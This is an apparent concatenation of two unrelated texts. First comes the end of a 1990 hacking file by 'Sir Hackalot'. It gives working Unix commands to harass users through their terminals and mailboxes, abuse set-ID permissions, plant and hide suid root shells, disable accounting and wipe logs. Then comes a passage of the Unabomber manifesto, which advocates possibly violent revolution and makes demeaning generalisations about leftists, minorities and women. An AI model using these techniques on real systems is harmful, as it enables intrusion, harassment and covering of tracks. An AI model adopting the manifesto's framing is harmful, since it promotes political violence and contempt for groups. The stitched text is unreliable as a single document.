them.  It sends two backspaces to them every approx. 5 seconds.  You
should run this program in the background.  (&).  Here is an example:

$ who
sirhack     tty11
loozer      tty12
$ bsv tty12&
[1]  4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line.  However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right.  Else, you'll see a ^M at the end of every
line.  I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer.  You can annoy
users other ways.  One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read.  then, do this:

$ cat binary_file | mail loozer

or

$ mail loozer < binary file

That usually will spilt into 2 messages or more.  The 1st message will
have a from line.. (from you ..), but the second WILL NOT!  Since it does
not, the mail reader will keep exiting and giving him an error message until
it gets fixed..  The way to fix it is to go to the mail box that got hit
with this trick (usually only the one who got hit (or root) and do this),
and edit the file, and add a from line.. like
From username..

then it will be ok.  You can screw the user by "cat"ing a binary to his tty.
say Loozer is on tty12.  You can say..
$ cat binary_file >/dev/tty12
$
It may pause for a while while it outputs it.  If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff.  You can send the output of anything to his
terminal.  Even what YOU do in shell.  Like this:
$ sh >/dev/tty12
$
You'll get your prompts, but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.


There are many many things you can do.  You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell.  Be
creative.

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell.  If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID.  (kill -9 whatever).  Or, you can
lock them out by adding "kill -1 0" to their .profile.  On the subject of
holes, always look for BAD suid bits.  On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set.  When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff.  But it was not designed to change
the GROUP ID back.  The sysop had blundered there.  SO when I did an ID
I found my group to be "Mail".  Mailfiles are readble/writeable by the
user "mail", and the group "mail".  I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info.  So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it.  Some tips on doing so
is:
        1. Don't give it out.  If the sysadm sees that joeuser logged in 500
           times in one night....then....
        2. Don't stay on for hours at a time.  They can trace you then. Also
           they will know it is irregular to have joeuser on for 4 hours
           after work.
        3. Don't trash the system.  Don't erase important files, and don't
           hog inodes, or anything like that.  Use the machine for a specific
           purpose (to leech source code, develop programs, an Email site).
           Dont be an asshole, and don't try to erase everything you can.
        4. Don't screw with users constantly.  Watch their processes and
           run what they run.  It may get you good info (snoop!)
        5. If you add an account, first look at the accounts already in there
           If you see a bunch of accounts that are just 3 letter abbrv.'s,
           then make yours so.  If a bunch are "cln, dok, wed" or something,
           don't add one that is "joeuser", add one that is someone's
           full initials.

        6. When you add an account, put a woman's name in for the
           description, if it fits (Meaning, if only companies log on to the
           unix, put a company name there).  People do not suspect hackers
           to use women's names.  They look for men's names.
        7. Don't cost the Unix machine too much money.  Ie.. don't abuse an
           outdial, or if it controls trunks, do not set up a bunch of dial
           outs.  If there is a pad, don't use it unless you NEED it.
        8. Don't use x.25 pads.  Their usage is heavily logged.
        9. Turn off acct logging (acct off) if you have the access to.
           Turn it on when you are done.
       10. Remove any trojan horses you set up to give you access when you
           get access.
       11. Do NOT change the MOTD file to say "I hacked this system" Just
           thought I'd tell you.  Many MANY people do that, and lose access
           within 2 hours, if the unix is worth a spit.
       12. Use good judgement.  Cover your tracks.  If you use su, clean
           up the sulog.
       13. If you use cu, clean up the cu_log.
       14. If you use the smtp bug (wizard/debug), set up a uid shell.
       15. Hide all suid shells.  Here's how:
           goto /usr
           (or any dir)
           do:
           # mkdir ".. "
           # cd ".. "
           # cp /bin/sh ".whatever"
           # chmod a+s ".whatever"
           The "" are NEEDED to get to the directory ..  !  It will not show
           up in a listing, and it is hard as hell to get to by sysadms if
           you make 4 or 5 spaces in there ("..    "), because all they will
           see in a directory FULL list will be .. and they won't be able to
           get there unless they use "" and know the spacing.  "" is used
           when you want to do literals, or use a wildcard as part of a file
           name.
       16. Don't hog cpu time with password hackers.  They really don't work
           well.

       17. Don't use too much disk space.  If you archieve something to dl,
           dl it, then kill the archieve.
       18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...".  Wrong. (Yo Pheds! You reading this??).  It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks.  Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck.  Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix.  Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin).  Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system.  Why?  The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus.  So, they leave the system open to all...(inadvertedly..),
because they are not competant.  So, you could usually get on, and create
havoc, and at first they will think it is a bug..  I have seen this
happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions).  Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes.  You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean.  These
VARs are really actually working for us.  If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.


You can use this phile for whatever you want.  I can't stop you.  Just
to learn unix (heh) or whatever.  But its YOUR ass if you get caught.
Always consider the penalties before you attempt something.  Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it.  I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets.  You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS.  Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose.  This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

-Sir Hackalot of PHAZE
1990.
[[The Washington Post, September 19, 1995, Separate
Pullout. Note: single brackets [ ] are in the Post
document.]]


*This text was sent last June to The New York Times and
The Washington Post by the person who calls himself "FC,"
identified by the FBI as the Unabomber, whom authorities
have implicated in three murders and 16 bombings. The
author threatened to send a bomb to an unspecified
destination "with intent to kill " unless one of the
newspapers published this manuscript. The Attorney
General and the Director of the FBI recommended
publication. An article about the decision to publish the
document appears on the front page of today's paper.*


INDUSTRIAL SOCIETY AND ITS FUTURE

INTRODUCTION

1. The Industrial Revolution and its consequences have
been a disaster for the human race. They have greatly
increased the Iffe-expectancy of those of us who live in
"advanced" countries, but they have destabilized society,
have made life unfulfilling, have subjected human beings
to indignities, have led to widespread psychological
suffering (in the Third World to physical suffering as
well) and have inflicted severe damage on the natural
world. The continued development of technology will
worsen the situation. It will certainly subject human
being to greater indignities and inflict greater damage
on the natural world, it will probably lead to greater
social disruption and psychological suffering, and it may
lead to increased physical suffering even in "advanced"
countries.

2. The industrial-technological system may survive or it
may break down. If it survives, it MAY eventually achieve
a low level of physical and psychological sutfering, but
only after passing through a long and very painful period
of adjustment and only at the cost of permanently
reducing human beings and many other living organisms to
engineered products and mere cogs in the social machine.
Furthermore, if the system survives, the consequences
will be inevitable: There is no way of reforming or
modifying the system so as to prevent it from depriving
people of dignity and autonomy.

3. If the system breaks down the consequences will still
be very painful. But the bigger the system grows the more
disastrous the results of its breakdown will be, so if it
is to break down it had best break down sooner rather
than later.

4. We therefore advocate a revolution against the
industrial system. This revolution may or may not make
use of violence; it may be sudden or it may be a
relatively gradual process spanning a few decades. We
can't predict any of that. But we do outline in a very
general way the measures that those who hate the
industrial system should take in order to prepare the way
for a revolution against that form of society. This is
not to be a POLITICAL revolution. Its object will be to
overthrow not governments but the economic and
technological basis of the present society.

5. In this article we give attention to only some of the
negative developments that have grown out of the
industrial-technological system. Other such developments
we mention only briefly or ignore altogether. This does
not mean that we regard these other developments as
unimportant. For practical reasons we have to confine our
discussion to areas that have received insufficient
public attention or in which we have something new to
say. For example, since there are well-developed
environmental and wilderness movements, we have written
very little about environmental degradation or the
destruction of wild nature, even though we consider these
to be highly important.


THE PSYCHOLOGY OF MODERN LEFTISM

6. Almost everyone will agree that we live in a deeply
troubled society. One of the most widespread
manifestations of the craziness of our world is leftism,
so a discussion of the psychology of leftism can serve as
an introduction to the discussion of the problems of
modern society in general.

7. But what is leftism? During the first half of the 20th
century leftism could have been practically identified
with socialism. Today the movement is fragmented and it
is not clear who can properly be called a leftist. When
we speak of leftists in this article we have in mind
mainly socialists, collectivists, "politically correct"
types, feminists, gay and disability activists, animal
rights activists and the like. But not everyone who is
associated with one of these movements is a leftist. What
we are trying to get at in discussing leftism is not so
much movement or an ideology as a psychological type, or
rather a collection of related types. Thus, what we mean
by "leftism" will emerge more clearly in the course of
our discussion of leftist psychology. (Also, see
paragraphs 227-230.)

8. Even so, our conception of leftism will remain a good
deal less clear than we would wish, but there doesn't
seem to be any remedy for this. All we are trying to do
here is indicate in a rough and approximate way the two
psychological tendencies that we believe are the main
driving force of modern leftism. We by no means claim to
be telling the WHOLE truth about leftist psychology.
Also, our discussion is meant to apply to modern leftism
only. We leave open the question of the extent to which
our discussion could be applied to the leftists of the
19th and early 20th centuries.

9. The two psychological tendencies that underlie modern
leftism we call "feelings of inferiority" and
"oversocialization." Feelings of inferiority are
characteristic of modern leftism as a whole, while
oversocialization is characteristic only of a certain
segment of modern leftism; but this segment is highly
influential.


FEELINGS OF INFERIORITY

10. By "feelings of inferiority" we mean not only
inferiority feelings in the strict sense but a whole
spectrum of related traits; low self-esteem, feelings of
powerlessness, depressive tendencies, defeatism, guilt,
self-hatred, etc. We argue that modern leftists tend to
have some such feelings (possibly more or less repressed)
and that these feelings are decisive in determining the
direction of modern leftism.

11. When someone interprets as derogatory almost anything
that is said about him (or about groups with whom he
identifies) we conclude that he has inferiority feelings
or low self-esteem. This tendency is pronounced among
minority rights activists, whether or not they belong to
the minority groups whose rights they defend. They are
hypersensitive about the words used to designate
minorities and about anything that is said concerning
minorities. The terms "negro," "oriental," "handicapped"
or "chick" for an African, an Asian, a disabled person or
a woman originally had no derogatory connotation. "Broad"
and "chick" were merely the feminine equivalents of
"guy," "dude" or "fellow." The negative connotations have
been attached to these terms by the activists themselves.
Some animal rights activists have gone so far as to
reject the word "pet" and insist on its replacement by
"animal companion." Leftish anthropologists go to great
lengths to avoid saying anything about primitive peoples
that could conceivably be interpreted as negative. They
want to replace the word "primitive" by "nonliterate."
They may seem almost paranoid about anything that might
suggest that any primitive culture is inferior to ours. 
(We do not mean to imply that primitive cultures ARE
inferior to ours. We merely point out the hyper
sensitivity of leftish anthropologists.)

12. Those who are most sensitive about "politically
incorrect" terminology are not the average black
ghetto-dweller, Asian immigrant, abused woman or disabled
person, but a minority of activists, many of whom do not
even belong to any "oppressed" group but come from
privileged strata of society. Political correctness has
its stronghold among university professors, who have
secure employment with comfortable salaries, and the
majority of whom are heterosexual white males from
middle- to upper-middle-class families.

13. Many leftists have an intense identification with the
problems of groups that have an image of being weak
(women), defeated (American Indians), repellent
(homosexuals) or otherwise inferior. The leftists
themselves feel that these groups are inferior. They
would never admit to themselves that they have such
feelings, but it is precisely because they do see these
groups as inferior that they identify with their
problems. (We do not mean to suggest that women, Indians,
etc. ARE inferior; we are only making a point about
leftist psychology.)

14. Feminists are desperately anxious to prove that women
are as strong and as capable as men. Clearly they are
nagged by a fear that women may NOT be as strong and as
capable as men.

15. Leftists tend to hate anything that has an image of
being strong, good and successful. They hate America,
they hate Western civilization, they hate white males,
they hate rationality. The reasons that leftists give for
hating the West, etc. clearly do not correspond with
their real motives. They SAY they hate the West because
it is warlike, imperialistic, sexist, ethnocentric and so
forth, but where these same faults appear in socialist
countries or in primitive cultures, the leftist finds
excuses for them, or at best he GRUDGINGLY admits that
they exist; whereas he ENTHUSIASTICALLY points out (and
often greatly exaggerates) these faults where they appear
in Western civilization. Thus it is clear that these
faults are not the leftist's real motive for hating
America and the West. He hates America and the West
because they are strong and successful.

16. Words like "self-confidence," "self-reliance,"
"initiative," "enterprise," "optimism," etc., play little
role in the liberal and leftist vocabulary. The leftist
is anti-individualistic, pro-collectivist. He wants
society to solve every one's problems for them, satisfy
everyone's needs for them, take care of them. He is not
the sort of person who has an inner sense of confidence
in his ability to solve his own problems and satisfy his
own needs. The leftist is antagohistic to the concept of
competition because, deep inside, he feels like a loser.

17. Art forms that appeal to modern leftish intellectuals
tend to focus on sordidness, defeat and despair, or else
they take an orgiastic tone, throwing off rational
control as if there were no hope of accomplishing
anything through rational calculation and all that was
left was to immerse oneself in the sensations of the
moment.

18. Modern leftish philosophers tend to dismiss reason,
science, objective reality and to insist that everything
is culturally relative. It is true that one can ask
serious questions about the foundations of scientific
knowledge and about how, if at all, the concept of
objective reality can be defined. But it is obvious that
modern leftish philosophers are not simply cool-headed
logicians systematically analyzing the foundations of
knowledge. They are deeply involved emotionally in their
attack on truth and reality. They attack these concepts
because of their own psychological needs. For one thing,
their attack is an outlet for hostility, and, to the
extent that it is successful, it satisfies the drive for
power. More importantly, the leftist hates science and
rationality because they classify certain beliefs as true
(i.e., successful, superior) and other beliefs as false
(i.e., failed, inferior). The leftist's feelings of
inferiority run so deep that he cannot tolerate any
classification of some things as successful or superior
and other things as failed or inferior. This also
underlies the rejection by many leftists of the concept
of mental illness and of the utility of IQ tests.
Leftists are antagonistic to genetic explanations of
human abilities or behavior because such explanations
tend to make some persons appear superior or inferior to
others. Leftists prefer to give society the credit or
blame for an individual's ability or lack of it. Thus if
a person is "inferior" it is not his fault, but
society's, because he has not been brought up properly.

19. The leftist is not typically the kind of person whose
feelings of inferiority make him a braggart, an egotist,
a bully, a self-promoter, a ruthless competitor. This
kind of person has not wholly lost faith in himself. He
has a deficit in his sense of power and self-worth, but
he can still conceive of himself as having the capacity
to be strong, and his efforts to make himself strong
produce his unpleasant behavior. [1] But the leftist is
too far gone for that. His feelings of inferiority are so
ingrained that he cannot conceive of himself as
individually strong and valuable. Hence the collectivism
of the leftist. He can feel strong only as a member of a
large organization or a mass movement with which he
identifies himself.

20. Notice the masochistic tendency of leftist tactics.
Leftists protest by lying down in front of vehicles, they
intentionally provoke police or racists to abuse them,
etc. These tactics may often be effective, but many
leftists use them not as a means to an end but because
they PREFER masochistic tactics. Self-hatred is a leftist
trait.

21. Leftists may claim that their activism is motivated
by compassion or by moral principles, and moral principle
does play a role for the leftist of the oversocialized
type. But compassion and moral principle cannot be the
main motives for leftist activism. Hostility is too
prominent a component of leftist behavior; so is the
drive for power. Moreover, much leftist behavior is not
rationally calculated to be of benefit to the people whom
the leftists claim to be trying to help. For example, if
one believes that affirmative action is good for black
people, does it make sense to demand affirmative action
in hostile or dogmatic terms? Obviously it would be more
productive to take a diplomatic and conciliatory approach
that would make at least verbal and symbolic concessions
to white people who think that affirmative action
discriminates against them. But leftist activists do not
take such an approach because it would not satisfy their
emotional needs. Helping black people is not their real
goal. Instead, race problems serve as an excuse for them
to express their own hostility and frustrated need for
power. In doing so they actually harm black people,
because the activists' hostile attitude toward the white
majority tends to intensify race hatred.

22. If our society had no social problems at all, the
leftists would have to INVENT problems in order to
provide themselves with an excuse for making a fuss.

23. We emphasize that the foregoing does not pretend to
be an accurate description of everyone who might be
considered a leftist. It is only a rough indication of a
general tendency of leftism.


OVERSOCIALIZATION

24. Psychologists use the term "socialization" to
designate the process by which children are trained to
think and act as society demands. A person is said to be
well socialized if he believes in and obeys the moral
code of his society and fits in well as a functioning   
part of that society. It may seem senseless to say that
many leftists are over-socialized, since the leftist is
perceived as a rebel. Nevertheless, the position can be
defended. Many leftists are not such rebels as they seem.

25. The moral code of our society is so demanding that no
one can think, feel and act in a completely moral way.
For example, we are not supposed to hate anyone, yet
almost everyone hates somebody at some time or other,
whether he admits it to himself or not. Some people are
so highly socialized that the attempt to think, feel and
act morally imposes a severe burden on them. In order to
avoid feelings of guilt, they continually have to deceive
themselves about their own motives and find moral
explanations for feelings and actions that in reality
have a nonmoral origin. We use the term "oversocialized"
to describe such people. [2]

26. Oversocialization can lead to low self-esteem, a
sense of powerlessness, defeatism, guilt, etc. One of the
most important means by which our society socializes
children is by making them feel ashamed of behavior or
speech that is contrary to society's expectations. If
this is overdone, or if a particular child is especially
susceptible to such feelings, he ends by feeling ashamed
of HIMSELF. Moreover the thought and the behavior of the
oversocialized person are more restricted by society's
expectations than are those of the lightly socialized
person. The majority of people engage in a significant
amount of naughty behavior. They lie, they commit petty
thefts, they break traffic laws, they goof off at work,
they hate someone, they say spiteful things or they use
some underhanded trick to get ahead of the other guy. The
oversocialized person cannot do these things, or if he
does do them he generates in himself a sense of shame and
self-hatred. The oversocialized person cannot even
experience, without guilt, thoughts or feelings that are
contrary to the accepted morality; he cannot think
"unclean" thoughts. And socialization is not just a
matter of morality; we are socialized to conform to many
norms of behavior that do not fall under the heading of
morality. Thus the oversocialized person is kept on a
psychological leash and spends his life running on rails
that society has laid down for him. In many
oversocialized people this results in a sense of
constraint and powerlessness that can be a severe
hardship. We suggest that oversocialization is among the
more serious cruelties that human being inflict on one
another.

27. We argue that a very important and influential
segment of the modern left is oversocialized and that
their oversocialization is of great importance in
determining the direction of modern leftism. Leftists of
the oversocialized type tend to be intellectuals or
members of the upper-middle class. Notice that university
intellectuals [3] constitute the most highly socialized
segment of our society and also the most leftwing
segment.

28. The leftist of the oversocialized type tries to get
off his psychological leash and assert his autonomy by
rebelling. But usually he is not strong enough to rebel
against the most basic values of society. Generally
speaking, the goals of today's leftists are NOT in
conflict with the accepted morality. On the contrary, the
left takes an accepted moral principle, adopts it as its
own, and then accuses mainstream society of violating
that principle. Examples: racial equality, equality of
the sexes, helping poor people, peace as opposed to war,
nonviolence generally, freedom of expression, kindness to
animals. More fundamentally, the duty of the individual
to serve society and the duty of society to take care of
the individual. All these have been deeply rooted values
of our society (or at least of its middle and upper
classes [4] for a long time. These values are explicitly
or implicitly expressed or presupposed in most of the
material presented to us by the mainstream communications
media and the educational system. Leftists, especially
those of the oversocialized type, usually do not rebel
against these principles but justify their hostility to
society by claiming (with some degree of truth) that
society is not living up to these principles.

29. Here is an illustration of the way in which the
oversocialized leftist shows his real attachment to the
conventional attitudes of our society while pretending to
be in rebellion aginst it. Many leftists push for
affirmative action, for moving black people into
high-prestige jobs, for improved education in black
schools and more money for such schools; the way of life
of the black "underclass" they regard as a social
disgrace. They want to integrate the black man into the
system, make him a business executive, a lawyer, a
scientist just like upper-middle-class white people. The
leftists will reply that the last thing they want is to
make the black man into a copy of the white man; instead,
they want to preserve African American culture. But in
what does this preservation of African American culture
consist? It can hardly consist in anything more than
eating black-style food, listening to black-style music,
wearing black-style clothing and going to a black-style
church or mosque. In other words, it can express itself
only in superficial matters. In all ESSENTIAL respects
most leftists of the oversocialized type want to make the
black man conform to white, middle-class ideals. They
want to make him study technical subjects, become an
executive or a scientist, spend his life climbing the
status ladder to prove that black people are as good as
white. They want to make black fathers "responsible,"
they want black gangs to become nonviolent, etc. But
these are exactly the values of the industrial-
technological system. The system couldn't care less what
kind of music a man listens to, what kind of clothes he
wears or what religion he believes in as long as he
studies in school, holds a respectable job, climbs the
status ladder, is a "responsible" parent, is nonviolent
and so forth. In effect, however much he may deny it, the
oversocialized leftist wants to integrate the black man
into the system and make him adopt its values.

30. We certainly do not claim that leftists, even of the
oversocialized type, NEVER rebel against the fundamental
values of our society. Clearly they sometimes do. Some
oversocialized leftists have gone so far as to rebel
against one of modern society's most important principles
by engaging in physical violence. By their own account,
violence is for them a form of "liberation." In other
words, by committing violence they break through the
psychological restraints that have been trained into
them. Because they are oversocialized these restraints
have been more confining for them than for others; hence
their need to break free of them. But they usually
justify their rebellion in terms of mainstream values. If
they engage in violence they claim to be fighting against
racism or the like.

31. We realize that many objections could be raised to
the foregoing thumbnail sketch of leftist psychology. The
real situation is complex, and anything like a complete
description of it would take several volumes even if the
necessary data were available. We claim only to have
indicated very roughly the two most important tendencies
in the psychology of modern leftism.

32. The problems of the leftist are indicative of the
problems of our society as a whole. Low self-esteem,
depressive tendencies and defeatism are not restricted to
the left. Though they are especially noticeable in the
left, they are widespread in our society. And today's
society tries to socialize us to a greater extent than
any previous society. We are even told by experts how to
eat, how to exercise, how to make love, how to raise our
kids and so forth.


THE POWER PROCESS

33. Human beings have a need (probably based in biology)
for something that we will call the "power process." This
is closely related to the need for power (which is widely
recognized) but is not quite the same thing. The power
process has four elements. The three most clear-cut of
these we call goal, effort and attainment of goal.
(Everyone needs to have goals whose attainment requires
effort, and needs to succeed in attaining at least some
of his goals.) The fourth element is more difficult to
define and may not be necessary for everyone. We call it
autonomy and will discuss it later (paragraphs 42-44).

34. Consider the hypothetical case of a man who can have
anything he wants just by wishing for it. Such a man has
power, but he will develop serious psychological
problems. At first he will have a lot of fun, but by and
by he will become acutely bored and demoralized.
Eventually he may become clinically depressed. History
shows that leisured aristocracies tend to become
decadent. This is not true of fighting aristocracies that
have to struggle to maintain their power. But leisured,
secure aristocracies that have no need to exert
themselves usually become bored, hedonistic and
demoralized, even though they have power. This shows that
power is not enough. One must have goals toward which to
exercise one's power.

35. Everyone has goals; if nothing else, to obtain the
physical necessities of life: food, water and whatever
clothing and shelter are made necessary by the climate.
But the leisured aristocrat obtains these things without
effort. Hence his boredom and demoralization.

36. Nonattainment of important goals results in death if
the goals are physical necessities, and in frustration if
nonattainment of the goals is compatible with survival.
Consistent failure to attain goals throughout life
results in defeatism, low self-esteem or depression.

37. Thus, in order to avoid serious psychological
problems, a human being needs goals whose attainment
requires effort, and he must have a reasonable rate of
success in attaining his goals.

SURROGATE ACTIVITIES

38. But not every leisured aristocrat becomes bored and
demoralized. For example, the emperor Hirohito, instead
of sinking into decadent hedonism, devoted himself to
marine biology, a field in which he became distinguished.
When people do not have to exert themselves to satisfy
their physical needs they often set up artificial goals
for themselves. In many cases they then pursue these
goals with the same energy and emotional involvement that
they otherwise would have put into the search for
physical necessities. Thus the aristocrats of the Roman
Empire had their literary pretensions; many European
aristocrats a few centuries ago invested tremendous time
and energy in hunting, though they certainly didn't need
the meat; other aristocracies have competed for status
through elaborate displays of wealth; and a few
aristocrats, like Hirohito, have turned to science.

39. We use the term "surrogate activity" to designate an
activity that is directed toward an artificial goal that
people set up for themselves merely in order to have some
goal to work toward, or let us say, merely for the qake
of the "fulfillment" that they get from pursuing the
goal. Here is a rule of thumb for the identification of
surrogate activities. Given a person who devotes much
time and energy to the pursuit of goal X, ask yourself
this: If he had to devote most of his time and energy to
satisfying his biological needs, and if that effort
required him to use his physical and mental faculties in
a varied and interesting way, would he feel seriously
deprived because he did not attain goal X? If the answer
is no, then the person's pursuit of goal X is a surrogate
activity. Hirohito's studies in marine biology clearly
constituted a surrogate activity, since it is pretty
certain that if Hirohito had had to spend his time
working at interesting non-scientific tasks in order to
obtain the necessities of life, he would not have felt
deprived because he didn't know all about the anatomy and
life-cycles of marine animals. On the other hand the
pursuit of sex and love (for example) is not a surrogate
activity, because most people, even if their existence
were otherwise satisfactory, would feel deprived if they
passed their lives without ever having a relationship
with a member of the opposite sex. (But pursuit of an
excessive amount of sex, more than one really needs, can
be a surrogate activity.)

40. In modern industrial society only minimal effort is
necessary to satisfy one's physical needs. It is enough
to go through a training program to acquire some petty
technical skill, then come to work on time and exert the
very modest effort needed to hold a job. The only
requirements are a moderate amount of intelligence and,
most of all, simple OBEDIENCE. If one has those, society
takes care of one from cradle to grave. (Yes, there is an
underclass that cannot take the physical necessities for
granted, but we are speaking here of mainstream society.)
Thus it is not surprising that modern society is full of
surrogate activities. These include scientific work,
athletic achievement, humanitarian work, artistic and
literary creation, climbing the corporate ladder,
acquisition of money and material goods far beyond the
point at which they cease to give any additional physical
satisfaction, and social activism when it addresses
issues that are not important for the activist
personally, as in the case of white activists who work
for the rights of nonwhite minorities. These are not
always PURE surrogate activities, since for many people
they may be motivated in part by needs other than the
need to have some goal to pursue. Scientific work may be
motivated in part by a drive for prestige, artistic
creation by a need to express feelings, militant social
activism by hostility. But for most people who pursue
them, these activities are in large part surrogate
activities. For example, the majority of scientists will
probably agree that the "fulfillment" they get from their
work is more important than the money and prestige they
earn.

41. For many if not most people, surrogate activities are
less satisfying than the pursuit of real goals (that is,
goals that people would want to attain even if their need
for the power process were already fulfilled). One
indication of this is the fact that, in many or most
cases, people who are deeply involved in surrogate
activities are never satisfied, never at rest. Thus the
money-maker constantly strives for more and more wealth.
The scientist no sooner solves one problem than he moves
on to the next. The long-distance runner drives himself
to run always farther and faster. Many people who pursue
surrogate activities will say that they get far more
fulfillment from these activities than they do from the
"mundane" business of satisfying their biological needs,
but that is because in our society the effort needed to
satisfy the biological needs has been reduced to
triviality. More importantly, in our society people do
not satisfy their biological needs AUTONOMOUSLY but by
functioning as parts of an immense social machine. In
contrast, people generally have a great deal of autonomy
in pursuing their surrogate activities.


AUTONOMY

42. Autonomy as a part of the power process may not be
necessary for every individual. But most people need a
greater or lesser degree of autonomy in working toward
their goals. Their efforts must be undertaken on their
own initiative and must be under their own direction and
control. Yet most people do not have to exert this
initiative, direction and control as single individuals.
It is usually enough to act as a member of a SMALL group.
Thus if half a dozen people discuss a goal among
themselves and make a successful joint effort to attain
that goal, their need for the power process will be
served. But if they work under rigid orders handed down
from above that leave them no room for autonomous
decision and initiative, then their need for the power
process will not be served. The same is true when
decisions are made on a collective basis if the group
making the collective decision is so large that the role
of each individual is insignificant. [5]

43. It is true that some individuals seem to have little
need for autonomy. Either their drive for power is weak
or they satisfy it by identifying themselves with some
powerful organization to which they belong. And then
there are unthinking, animal types who seem to be
satisfied with a purely physical sense of power (the good
combat soldier, who gets his sense of power by developing
fighting skills that he is quite content to use in blind
obedience to his superiors).

44. But for most people it is through the power process
having a goal, making an AUTONOMOUS effort and attaining
the goal -- that self-esteem, self-confidence and a sense
of power are acquired. When one does not have adequate
opportunity to go through the power process the
consequences are (depending on the individual and on the
way the power process is disrupted) boredom,
demoralization, low self-esteem, inferiority feelings,
defeatism, depression, anxiety, guilt, frustration,
hostility, spouse or child abuse, insatiable hedonism,
abnormal sexual behavior, sleep disorders, eating
disorders. etc. [6]


SOURCES OF SOCIAL PROBLEMS

45. Any of the foregoing symptoms can occur in any
society, but in modern industrial society they are
present on a massive scale. We aren't the first to
mention that the world today seems to be going crazy.
This sort of thing is not normal for human societies.
There is good reason to believe that primitive man
suffered from less stress and frustration and was better
satisfied with his way of life than modern man is. It is
true that not all was sweetness and light in primitive
societies. Abuse of women was common among the Australian
aborigines, transexuality was fairly common among some of
the American Indian tribes. But it does appear that
GENERALLY SPEAKING the kinds of problems that we have
listed in the preceding paragraph were far less common
among primitive peoples than they are in modern society.

46. We attribute the social and psychological problems of
modern society to the fact that that society requires
people to live under conditions radically different from
those under which the human race evolved and to behave in
ways that conflict with the patterns of behavior that the
human race developed while living under the earlier
conditions. It is clear from what we have already written
that we consider lack of opportunity to properly
experience the power process as the most important of the
abnormal conditions to which modern society subjects
people. But it is not the only one. Before dealing with
disruption of the power process as a source of social
problems we will discuss some of the other sources.

47. Among the abnormal conditions present in modern
industrial society are excessive density of population,
isolation of man from nature, excessive rapidity of
social change and the breakdown of natural small-scale
communities such as the extended family, the village or
the tribe.

48. It is well known that crowding increases stress and
aggression. The degree of crowding that exists today and
the isolation of man from nature are consequences of
technological progress. All pre-industrial societies were
predominantly rural. The Industrial Revolution vastly
increased the size of cities and the proportion of the
population that lives in them, and modern agricultural
technology has made it possible for the Earth to support
a far denser population than it ever did before. (Also,
technology exacerbates the effects of crowding because it
puts increased disruptive powers in people's hands. For
example, a variety of noise-making devices: power mowers,
radios, motorcycles, etc. If the use of these devices is
unrestricted, people who want peace and quiet are
frustrated by the noise. If their use is restricted,
people who use the devices are frustrated by the
regulations. But if these machines had never been
invented there would have been no conflict and no
frustration generated by them.)

49. For primitive societies the natural world (which
usually changes only slowly) provided a stable framework
and therefore a sense of security. In the modern world it
is human society that dominates nature rather than the
other way around, and modern society changes very rapidly
owing to technological change. Thus there is no stable
framework.

50. The conservatives are fools: They whine about the
decay of traditional values, yet they enthusiastically
support technological progress and economic growth.
Apparently it never occurs to them that you can't make
rapid, drastic changes in the technology and the economy
of a society without causing rapid changes in all other
aspects of the society as well, and that such rapid
changes inevitably break down traditional values.

51. The breakdown of traditional values to some extent
implies the breakdown of the bonds that hold together
traditional small-scale social groups. The disintegration
of small-scale social groups is also promoted by the fact
that modern conditions often require or tempt individuals
to move to new locations, separating themselves from
their communities. Beyond that, a technological society
HAS TO weaken family ties and local communities if it is
to function efficiently. In modern society an
individual's loyalty must be first to the system and only
secondarily to a smallscale community, because if the
internal loyalties of small-scale communities were
stronger than loyalty to the system, such communities
would pursue their own advantage at the expense of the
system.

52. Suppose that a public official or a corporation
executive appoints his cousin, his friend or his
co-religionist to a position rather than appointing the
person best qualified for the job. He has permitted
personal loyalty to supersede his loyalty to the system,
and that is "nepotism" or "discrimination," both of which
